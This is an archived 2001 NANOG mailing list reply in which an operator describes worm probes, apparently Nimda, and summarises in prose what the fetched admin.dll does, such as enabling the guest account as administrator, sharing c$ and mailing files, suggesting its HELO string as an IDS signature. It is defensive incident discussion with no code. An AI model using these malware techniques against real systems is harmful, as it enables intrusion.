nanog mailing list archives
Re: Worm probes
From: Chris Grout <cgrout () chrisgrout com>
Date: Tue, 18 Sep 2001 08:52:37 -0700
Appears that if it gets a 404 back from its intial unicode scans, it just keeps looking elsewhere. If the server responds with anything other than a 404 (such as a 403 IP Rejected, in this case...) It attempts to get the server to tftp a file named "admin.dll" from the scanning system.
I pulled the admin.dll from an infected box and to my non-programming eyes, it appears to do at least the following (in no order):
1. Adds the guest account to the local Administrators group and then activates the account
2. Use the anonymous 3. Makes sure c$ is shared4. Tries to mail a bunch of files. HELO it uses is aabbcc. <*** Might be able to use this for a quick and dirty IDS Sig***>
5. Looks like admin.dll ends up in "c", "d" and "e". 6. creates a file named readme.exe which is actually a wav file (weird?) I could be totally wrong here (and probably am) but oh well... Chris
Current thread:
- Worm probes sigma (Sep 18)
- Re: Worm probes ravi pina (Sep 18)
- Re: Worm probes deeann mikula (Sep 18)
- Re: Worm probes up (Sep 18)
- Re: Worm probes Bryan Heitman (Sep 18)
- Re: Worm probes Valdis . Kletnieks (Sep 18)
- Re: Worm probes Eric Gauthier (Sep 18)
- Re: Worm probes.. Looking for captures. Michael Airhart (Sep 18)
- Re: Worm probes deeann mikula (Sep 18)
- Re: Worm probes Chris Grout (Sep 18)
- Re: Worm probes ravi pina (Sep 18)
- Re: Worm probes ravi pina (Sep 18)
- RE: Worm probes Mark Radabaugh - Amplex (Sep 18)
- RE: Worm probes Mark Radabaugh - Amplex (Sep 18)
- RE: Worm probes Tim Winders (Sep 18)
- Re: Worm probes Jared Mauch (Sep 18)
- Re: Worm probes Bill Larson (Sep 18)
- Re: Worm probes Christopher X. Candreva (Sep 18)
- Re: Worm probes Bill Larson (Sep 18)
- Re: Worm probes sigma (Sep 18)
- Re: Worm probes Valdis . Kletnieks (Sep 18)